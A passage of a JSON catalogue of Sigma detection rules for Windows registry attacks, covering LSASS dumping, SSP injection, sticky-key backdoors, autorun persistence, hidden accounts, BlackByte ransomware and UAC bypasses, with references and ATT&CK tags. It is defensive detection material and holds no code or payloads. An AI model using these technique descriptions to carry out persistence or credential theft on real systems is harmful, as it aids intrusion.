registered to dump the memory of the lsass.exe process", - "uuid": "55e29995-75e7-451a-bef0-6225e2f13597", - "value": "SilentProcessExit Monitor Registration for LSASS", - "meta": { - "refs": [ - "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", - "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.007" - ], - "creation_date": "2021/02/26", - "filename": "registry_event_silentprocessexit_lsass.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the addition of a SSP to the 
registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "uuid": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", - "value": "Security Support Provider (SSP) Added to LSA Configuration", - "meta": { - "refs": [ - "https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.005" - ], - "creation_date": "2019/01/18", - "filename": "registry_event_ssp_added_lsa_config.yml", - "author": "iwillkeepwatch", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "uuid": "baca5663-583c-45f9-b5dc-ea96a22ce542", - "value": "Sticky Key Like Backdoor Usage - Registry", - "meta": { - "refs": [ - "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" - ], - "creation_date": "2018/03/15", - "filename": "registry_event_stickykey_like_backdoor.yml", - "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation/modification of Assistive Technology applications and 
persistence with usage of 'at'", - "uuid": "9577edbb-851f-4243-8c91-1d5b50c1a39b", - "value": "Atbroker Registry Change", - "meta": { - "refs": [ - "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", - "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.persistence", - "attack.t1547" - ], - "creation_date": "2020/10/13", - "filename": "registry_event_susp_atbroker_change.yml", - "author": "Mateusz Wydra, oscd.community", - "level": "medium", - "falsepositive": [ - "Creation of non-default, legitimate at usage" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "uuid": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "value": "Suspicious Run Key from Download", - "meta": { - "refs": [ - "https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/01", - "filename": "registry_event_susp_download_run_key.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Software installers downloaded and used by users" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "uuid": "b3503044-60ce-4bf4-bbcb-e3db98788823", - "value": "DLL Load via LSASS", - "meta": { - "refs": [ - "https://blog.xpnsec.com/exploring-mimikatz-part-1/", - 
"https://twitter.com/SBousseaden/status/1183745981189427200", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1547.008" - ], - "creation_date": "2019/10/16", - "filename": "registry_event_susp_lsass_dll_load.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects Processes accessing the camera and microphone from suspicious folder", - "uuid": "62120148-6b7a-42be-8b91-271c04e281a3", - "value": "Suspicious Camera and Microphone Access", - "meta": { - "refs": [ - "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml" - ], - "tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" - ], - "creation_date": "2020/06/07", - "filename": "registry_event_susp_mic_cam_access.yml", - "author": "Den Iuzvyk", - "level": "high", - "falsepositive": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Alerts on trust record modification within the registry, indicating usage of macros", - "uuid": "295a59c1-7b79-4b47-a930-df12c15fc9c2", - "value": "Windows Registry Trust Record Modification", - "meta": { - "refs": [ - "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/", - "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_trust_record_modification.yml" - ], - "tags": [ - 
"attack.initial_access", - "attack.t1566.001" - ], - "creation_date": "2020/02/19", - "filename": "registry_event_trust_record_modification.yml", - "author": "Antonlovesdnb", - "level": "medium", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - "uuid": "4e8d5fd3-c959-441f-a941-f73d0cdcdca5", - "value": "Abusing Windows Telemetry For Persistence - Registry", - "meta": { - "refs": [ - "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_abusing_windows_telemetry_for_persistence.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112", - "attack.t1053" - ], - "creation_date": "2020/09/29", - "filename": "registry_set_abusing_windows_telemetry_for_persistence.yml", - "author": "Sreeman", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect modification for a specific user to prevent that user from being listed on the logon screen", - "uuid": "8a58209c-7ae6-4027-afb0-307a78e4589a", - "value": "User Account Hidden By Registry", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_hidden_user.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.002" - ], - "creation_date": "2022/08/20", - "filename": "registry_set_add_hidden_user.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "uuid": "1547e27c-3974-43e2-a7d7-7f484fb928ec", - "value": "Registry Persitence via Service in Safe Mode", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ], - "creation_date": "2022/04/04", - "filename": "registry_set_add_load_service_in_safe_mode.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "uuid": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", - "value": "Add Port Monitor Persistence in Registry", - "meta": { - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.010" - ], - "creation_date": "2021/12/30", - "filename": "registry_set_add_port_monitor.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", - "uuid": "092af964-4233-4373-b4ba-d86ea2890288", - "value": "Add Debugger Entry To AeDebug For Persistence", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/aedebug.html", - "https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "registry_set_aedebug_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of the key to setup a debugger. 
Which is often the case on developers machines" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", - "uuid": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", - "value": "Allow RDP Remote Assistance Feature", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/08/19", - "filename": "registry_set_allow_rdp_remote_assistance_feature.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitmate use of the feature (alerts should be investigated either way)" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "9df5f547-c86a-433e-b533-f2794357e242", - "value": "Classes Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_classes.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - 
"falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", - "value": "Common Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://persistence-info.github.io/Data/userinitmprlogonscript.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_common.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "f674e36a-4b91-431e-8aef-f8a96c2aca35", - "value": "CurrentControlSet Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - 
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", - "value": "CurrentVersion Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_currentversion.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - 
"falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "cbf93e5d-ca6c-4722-8bea-e9119007c248", - "value": "CurrentVersion NT Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "a80f662f-022f-4429-9b8c-b1a41aaa6688", - "value": "Internet Explorer Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - 
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "baecf8fb-edbf-429f-9ade-31fc3f22b970", - "value": "Office Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_office.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for 
legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "046218bd-e0d8-4113-a3c3-895a12b2b298", - "value": "Session Manager Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001", - "attack.t1546.009" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_session_manager.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", - "value": "System Scripts Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", - "value": "WinSock2 Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_winsock2.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - 
"logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", - "value": "Wow6432Node CurrentVersion Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "18f2065c-d36c-464a-a748-bcf909acb2e3", - "value": "Wow6432Node Classes Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "480421f9-417f-4d3b-9552-fd2728443ec8", - "value": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for 
legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "uuid": "83314318-052a-4c90-a1ad-660ece38d276", - "value": "Blackbyte Ransomware Registry", - "meta": { - "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/01/24", - "filename": "registry_set_blackbyte_ransomware.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Bypasses User Account Control using a fileless method", - "uuid": "46dd5308-4572-4d12-aa43-8938f0184d4f", - "value": "Bypass UAC Using DelegateExecute", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", - "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" - ], - "creation_date": "2022/01/05", - "filename": "registry_set_bypass_uac_using_delegateexecute.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - 
], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", - "uuid": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", - "value": "Bypass UAC Using Event Viewer", - "meta": { - "refs": [ - "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.010" - ], - "creation_date": "2022/01/05", - "filename": "registry_set_bypass_uac_using_eventviewer.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - 